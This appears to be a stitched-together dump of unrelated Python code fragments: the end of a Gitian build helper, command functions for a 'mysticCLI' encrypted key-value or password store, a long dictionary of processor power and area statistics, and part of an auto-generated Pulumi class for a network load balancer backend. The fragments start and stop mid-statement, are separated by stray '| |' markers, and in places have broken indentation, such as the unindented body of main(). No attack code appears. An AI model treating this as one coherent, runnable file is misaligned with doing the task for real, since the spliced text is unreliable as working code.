    if not source_dir.is_dir():
        raise Exception("Gitian descriptor dir '%s' does not exist" % source_dir)
    target_dir.mkdir(parents=True, exist_ok=True)
    for descriptor_in in source_dir.glob("*.yml"):
        descriptor_out = target_dir / descriptor_in.name
        with descriptor_out.open("w") as file_out, descriptor_in.open() as file_in:
            for line in file_in:
                if hosts and line.startswith(' HOSTS='):
                    file_out.write(' HOSTS="%s"\n' % hosts)
                else:
                    file_out.write(line)
def create_work_dir(work_dir):
    """Ensure the working directory exists and return its resolved Path.

    Raises an Exception when the path exists but is not a directory.
    """
    path = Path(work_dir)
    if path.exists():
        if not path.is_dir():
            raise Exception("Work dir '%s' exists but is not a directory." % path)
    else:
        print("Creating working directory '%s'" % path)
        path.mkdir()
    return path.resolve()
def main():
parser = argparse.ArgumentParser(usage='%(prog)s [options]')
parser.add_argument('-c', '--commit', action='store_true', dest='commit', help='Indicate that the version argument is for a commit or branch')
parser.add_argument('-p', '--pull', action='store_true', dest='pull', help='Indicate that the version | |
<reponame>bentheiii/mystic<filename>mysticCLI/commands.py
from __future__ import annotations
from typing import Dict, Type
import re
import textwrap
import os.path
import cryptography
try:
import pyperclip
except ImportError:
pyperclip = None
try:
import tkinter as tk
from tkinter import filedialog as tk_filedialog
except ImportError:
tk = None
from mysticlib import Mystic
import mysticlib
from mysticCLI.resettable_timer import ResettableTimer
from mysticCLI.__util import *
import mysticCLI.__data as data
class Command:
    """A named CLI command; instances self-register into Command.all.

    Used as a decorator on command functions: ``@Command`` replaces the
    function with a Command instance keyed by the function's __name__.
    The function's docstring (dedented) becomes the command's help text.
    """
    # Registry of every command, keyed by function name.
    all: Dict[str, Command] = {}

    def __init__(self, func):
        # Raise (rather than assert) so the duplicate-name guard still
        # fires when the interpreter runs with -O.
        if func.__name__ in self.all:
            raise ValueError(f'{func} overrides another command')
        self.all[func.__name__] = self
        self.sign = get_command_sign(func)  # argument signature, via project helper
        self.help = textwrap.dedent(func.__doc__)
        self.func = func

    def __call__(self, *args, **kwargs):
        return self.func(*args, **kwargs)
@Command
def add_password(*, myst: Mystic, **kwargs):
    """
    Add a password to the mystic. Takes no arguments. You will be prompted to enter the new password. If a password already exists, you will be prompted to enter it too.
    """
    # Editing is only possible once write mode has been enabled.
    if myst.mutable:
        myst.add_password()
        return 'new password added'
    return 'the myst is in read-only mode, use the enable_write command to enable editing'
@Command
def del_password(*, myst: Mystic, **kwargs):
    """
    Delete a password from the mystic. Takes no arguments. You will be prompted to enter the password to delete. You cannot delete the only password, add a password beforehand.
    """
    # This docstring is shown as CLI help (Command.help); the "Yuo" typo is
    # fixed above. Editing commands are rejected in read-only mode.
    if not myst.mutable:
        return 'the myst is in read-only mode, use the enable_write command to enable editing'
    myst.del_password()
    return 'password deleted'
@Command
def get(key, *, myst: Mystic, **kwargs):
    """
    Retrieve the value of a specific key. Note that the key must match exactly, use either search or lookup for a fuzzy search. Takes the key as a single argument.
    """
    # Exact mapping-style lookup on the Mystic; no fuzzy matching here.
    value = myst[key]
    return value
def _search(myst, pattern):
p = re.compile(pattern)
results = []
for k, v in myst.items():
if p.search(k):
results.append((k, v))
if len(results) == 0:
return 'no results found matching pattern'
if len(results) == 1:
return results[0]
for i, (k, _) in enumerate(results):
print(f'{i}\t{k}')
while True:
i = input('enter the number of the key, or "x" to cancel search\n')
if i == 'x':
return 'search cancelled'
try:
i = int(i)
ret = results[i]
except ValueError:
print('invalid number')
except IndexError:
print('index out of bounds')
else:
break
return ret
@Command
def search(pattern, *, myst: Mystic, **kwargs):
    """
    Search for a key in the mystic. Prompting you for all the possible keys matching a regular expression pattern. Accepts a regex pattern.
    """
    found = _search(myst, pattern)
    # _search returns a status string on failure/cancel, else a (key, value).
    if isinstance(found, str):
        return found
    key, value = found
    return f'{key}: {value}'
def _lookup(myst, auto_display_thresh=10, start=''):
    """Interactively narrow the myst's keys down to a single (key, value).

    The user types successive letters; only keys containing the accumulated
    pattern as a substring stay candidates. Candidate lists smaller than
    `auto_display_thresh` are displayed automatically. Returns the chosen
    (key, value) tuple, or a status string ('no candidates' /
    'lookup cancelled').
    """
    orig_cands = set(myst.items())
    candidates = set(orig_cands)
    pattern = start
    while True:
        if len(candidates) == 0:
            # Dead end: offer to drop the last typed letter and retry.
            if pattern == '':
                return 'no candidates'
            response = input(f'no valid candidates for pattern {pattern}, go back one? [y/n]\n').lower()
            if response == 'y':
                pattern = pattern[:-1]
                # Rebuild the candidate set from scratch for the shortened pattern.
                candidates = {(k, v) for (k, v) in orig_cands if (pattern in k)} # todo fuzzy search
                continue
            return 'lookup cancelled'
        if len(candidates) == 1:
            return next(iter(candidates))
        next_letters = None
        if len(candidates) < auto_display_thresh:
            disp = True
        else:
            response = input(
                f'there are {len(candidates)} candidates, enter #d to display, letters to continue searching, or #x to cancel\n')
            if response == '#d':
                disp = True
            elif response == '#x':
                return 'lookup cancelled'
            else:
                disp = False
                next_letters = response
        if disp:
            assert next_letters is None
            print('query: ' + pattern)
            # Sort alphabetically so the printed indices are stable.
            c = sorted(candidates, key=lambda x: x[0])
            for i, (k, _) in enumerate(c):
                print(f'#{i}\t{k}')
            while next_letters is None:
                response = input(
                    'enter the number (starting with #) to access that key, #x to cancel, or letters to continue searching\n')
                if response == '#x':
                    return 'lookup cancelled'
                if response.startswith('#'):
                    response = response[1:]
                    try:
                        ret = int(response)
                        return c[ret]
                    except ValueError:
                        print('could not parse number ' + response)
                    except IndexError:
                        print('out of bounds')
                # NOTE(review): after a failed '#<n>' parse the '#' has
                # already been stripped, so the remainder is treated as
                # search letters below.
                next_letters = response
        assert next_letters is not None
        pattern += next_letters
        # Prune candidates that no longer contain the extended pattern.
        for k, _ in list(candidates):
            if pattern not in k: # todo fuzzy search
                candidates.remove((k, _))
@Command
def lookup(start='', *, myst, **kwargs):
    """
    Search for a key in the mystic. Prompting you for additional letters to search for until only a few remain. Accepts an optional first characters to begin the search with.
    """
    found = _lookup(myst, start=start)
    # _lookup returns a status string on failure/cancel, else a (key, value).
    if isinstance(found, str):
        return found
    key, value = found
    return f'{key}: {value}'
@Command
def add(key=None, value=None, *, myst, getpass, **kwargs):
    """
    Add a new key-value pair. Accepts an optional key and an optional value for the key. If the key or value is not entered, a secure input will be prompted to enter them.
    """
    # Help-text typo fixed above ("a optional" -> "an optional"); behavior
    # unchanged. Editing is rejected in read-only mode.
    if not myst.mutable:
        return 'the myst is in read-only mode, use the enable_write command to enable editing'
    if key is None:
        key = getpass('enter the key\n')
    if key in myst:
        return 'key already exists, use update or set_pair to change existing pairs'
    if value is None:
        value = getpass('enter the value\n')
    myst[key] = value
    return 'pair added'
@Command
def update(key=None, value=None, *, myst, getpass, **kwargs):
    """
    Update a key-value pair to a new value. Accepts an optional key and an optional value for the key. If the key or value is not entered, a secure input will be prompted to enter them. If the value ends with a '[', the previous value will be appended to its new value in square brackets.
    """
    # Help-text and message grammar fixed ("a optional", "does not exists").
    if not myst.mutable:
        return 'the myst is in read-only mode, use the enable_write command to enable editing'
    if key is None:
        key = getpass('enter the key\n')
    if key not in myst:
        return 'key does not exist, use add or set_pair to add new pairs'
    if value is None:
        value = getpass('enter the value\n')
    # A trailing '[' means "append the previous value in square brackets".
    if value.endswith('['):
        value = value + myst[key] + ']'
    myst[key] = value
    return 'pair updated'
@Command
def update_search(pattern, value=None, *, myst, getpass, **kwargs):
    """
    Update a key-value pair to a new value, searching for the key with a regex pattern. Accepts a regular expression pattern and an optional value. If the value is not provided, a secure input will be prompted to enter it. If the value ends with a '[', the previous value will be appended to its new value in square brackets.
    """
    if not myst.mutable:
        return 'the myst is in read-only mode, use the enable_write command to enable editing'
    found = _search(myst, pattern)
    # _search returns a status string on failure/cancel.
    if isinstance(found, str):
        return found
    key, previous = found
    if value is None:
        value = getpass('enter the value\n')
    # A trailing '[' appends the previous value in square brackets.
    if value.endswith('['):
        value = value + previous + ']'
    myst[key] = value
    return 'pair updated'
@Command
def update_lookup(value=None, *, myst, getpass, **kwargs):
    """
    Update a key-value pair to a new value, looking for the key via simple search. Accepts an optional value. If the value is not provided, a secure input will be prompted to enter it. If the value ends with a '[', the previous value will be appended to its new value in square brackets.
    """
    if not myst.mutable:
        return 'the myst is in read-only mode, use the enable_write command to enable editing'
    found = _lookup(myst)
    # _lookup returns a status string on failure/cancel.
    if isinstance(found, str):
        return found
    key, previous = found
    if value is None:
        value = getpass('enter the value\n')
    # A trailing '[' appends the previous value in square brackets.
    if value.endswith('['):
        value = value + previous + ']'
    myst[key] = value
    return 'pair updated'
@Command
def set_pair(key=None, value=None, *, myst, getpass, **kwargs):
    """
    Set a key-value pair to a new value, regardless of whether the key already exists. Accepts an optional key and an optional value for the key. If the key or value is not entered, a secure input will be prompted to enter them.
    """
    if not myst.mutable:
        return 'the myst is in read-only mode, use the enable_write command to enable editing'
    if key is None:
        key = getpass('enter the key\n')
    # Unlike add/update, no existence check: always overwrite or create.
    myst[key] = value if value is not None else getpass('enter the value\n')
    return 'pair set'
@Command
def quit(*, myst: Mystic, **kwargs):
    """
    Exit the mysticCLI. Will prompt if any unsaved changes are recorded.
    """
    if not myst.changed():
        return False
    response = input('unsaved changes are recorded, press enter to continue, enter anything to cancel\n').lower()
    # Non-empty input returns '' (presumably aborts quitting in the REPL
    # loop -- confirm against the caller); False signals the actual quit.
    return '' if response else False
@Command
def save(path=None, *, myst: Mystic, timer: ResettableTimer, source_path=None, **kwargs):
"""
Will save the mystic to a file. Accepts a path for the file. If the path is not provided, the mystic's source path will be used, if available. | |
Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.228254,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 5.76697,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202689,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.0,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.174264,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.281081,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.14188,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.597225,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.199307,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.21288,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00730941,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0528562,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0540576,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0528562,
'Execution Unit/Register Files/Runtime Dynamic': 0.061367,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.111353,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.291709,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.55837,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00233591,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00233591,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00211747,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000865042,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000776541,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00756582,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0194348,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0519669,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 3.30554,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.175997,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.176503,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.68448,
'Instruction Fetch Unit/Runtime Dynamic': 0.431468,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.00557278,
'L2/Runtime Dynamic': 0.00179075,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.49535,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.607223,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0407067,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0407067,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 2.68757,
'Load Store Unit/Runtime Dynamic': 0.848682,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.100376,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.200752,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0356237,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0356827,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.205526,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.028925,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.42283,
'Memory Management Unit/Runtime Dynamic': 0.0646078,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 16.6028,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.00786231,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.088943,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': | |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['BackendArgs', 'Backend']
@pulumi.input_type
class BackendArgs:
    def __init__(__self__, *,
                 backend_set_name: pulumi.Input[str],
                 network_load_balancer_id: pulumi.Input[str],
                 port: pulumi.Input[int],
                 ip_address: Optional[pulumi.Input[str]] = None,
                 is_backup: Optional[pulumi.Input[bool]] = None,
                 is_drain: Optional[pulumi.Input[bool]] = None,
                 is_offline: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 target_id: Optional[pulumi.Input[str]] = None,
                 weight: Optional[pulumi.Input[int]] = None):
        """
        The set of arguments for constructing a Backend resource.

        :param backend_set_name: Name of the backend set receiving this server. Example: `example_backend_set`
        :param network_load_balancer_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the network load balancer to update.
        :param port: Communication port of the backend server. Example: `8080`
        :param ip_address: IP address of the backend server. Example: `10.0.0.3`
        :param is_backup: (Updatable) Treat this server as a backup unit: it receives ingress
            traffic only when all non-backup servers fail the health check policy. Example: `false`
        :param is_drain: (Updatable) Drain this server; servers marked "isDrain" receive no
            incoming traffic. Example: `false`
        :param is_offline: (Updatable) Treat this server as offline; offline servers receive no
            incoming traffic. Example: `false`
        :param name: Optional unique backend name within the backend set; generated when omitted.
            Example: `webServer1`
        :param target_id: The IP OCID/Instance OCID associated with the backend server.
            Example: `ocid1.privateip..oc1.<var><unique_ID></var>`
        :param weight: (Updatable) Load-balancing policy weight; servers with a higher weight
            receive proportionally more new connections. Example: `3`
        """
        # The three required arguments are always recorded on the instance.
        pulumi.set(__self__, "backend_set_name", backend_set_name)
        pulumi.set(__self__, "network_load_balancer_id", network_load_balancer_id)
        pulumi.set(__self__, "port", port)
        # Optional arguments are recorded only when the caller supplied them,
        # preserving the original set order.
        for optional_key, optional_value in (
                ("ip_address", ip_address),
                ("is_backup", is_backup),
                ("is_drain", is_drain),
                ("is_offline", is_offline),
                ("name", name),
                ("target_id", target_id),
                ("weight", weight)):
            if optional_value is not None:
                pulumi.set(__self__, optional_key, optional_value)

    @property
    @pulumi.getter(name="backendSetName")
    def backend_set_name(self) -> pulumi.Input[str]:
        """Name of the backend set receiving this server. Example: `example_backend_set`"""
        return pulumi.get(self, "backend_set_name")

    @backend_set_name.setter
    def backend_set_name(self, value: pulumi.Input[str]):
        pulumi.set(self, "backend_set_name", value)

    @property
    @pulumi.getter(name="networkLoadBalancerId")
    def network_load_balancer_id(self) -> pulumi.Input[str]:
        """The OCID of the network load balancer to update."""
        return pulumi.get(self, "network_load_balancer_id")

    @network_load_balancer_id.setter
    def network_load_balancer_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "network_load_balancer_id", value)

    @property
    @pulumi.getter
    def port(self) -> pulumi.Input[int]:
        """Communication port of the backend server. Example: `8080`"""
        return pulumi.get(self, "port")

    @port.setter
    def port(self, value: pulumi.Input[int]):
        pulumi.set(self, "port", value)

    @property
    @pulumi.getter(name="ipAddress")
    def ip_address(self) -> Optional[pulumi.Input[str]]:
        """IP address of the backend server. Example: `10.0.0.3`"""
        return pulumi.get(self, "ip_address")

    @ip_address.setter
    def ip_address(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "ip_address", value)

    @property
    @pulumi.getter(name="isBackup")
    def is_backup(self) -> Optional[pulumi.Input[bool]]:
        """(Updatable) Whether to treat this server as a backup unit. Example: `false`"""
        return pulumi.get(self, "is_backup")

    @is_backup.setter
    def is_backup(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_backup", value)

    @property
    @pulumi.getter(name="isDrain")
    def is_drain(self) -> Optional[pulumi.Input[bool]]:
        """(Updatable) Whether this server is draining (receives no new traffic). Example: `false`"""
        return pulumi.get(self, "is_drain")

    @is_drain.setter
    def is_drain(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_drain", value)

    @property
    @pulumi.getter(name="isOffline")
    def is_offline(self) -> Optional[pulumi.Input[bool]]:
        """(Updatable) Whether to treat this server as offline. Example: `false`"""
        return pulumi.get(self, "is_offline")

    @is_offline.setter
    def is_offline(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_offline", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """Optional unique backend name within the backend set; generated when omitted. Example: `webServer1`"""
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    @property
    @pulumi.getter(name="targetId")
    def target_id(self) -> Optional[pulumi.Input[str]]:
        """The IP OCID/Instance OCID associated with the backend server."""
        return pulumi.get(self, "target_id")

    @target_id.setter
    def target_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "target_id", value)

    @property
    @pulumi.getter
    def weight(self) -> Optional[pulumi.Input[int]]:
        """(Updatable) Load-balancing policy weight assigned to the server. Example: `3`"""
        return pulumi.get(self, "weight")

    @weight.setter
    def weight(self, value: Optional[pulumi.Input[int]]):
        pulumi.set(self, "weight", value)
@pulumi.input_type
class _BackendState:
def __init__(__self__, *,
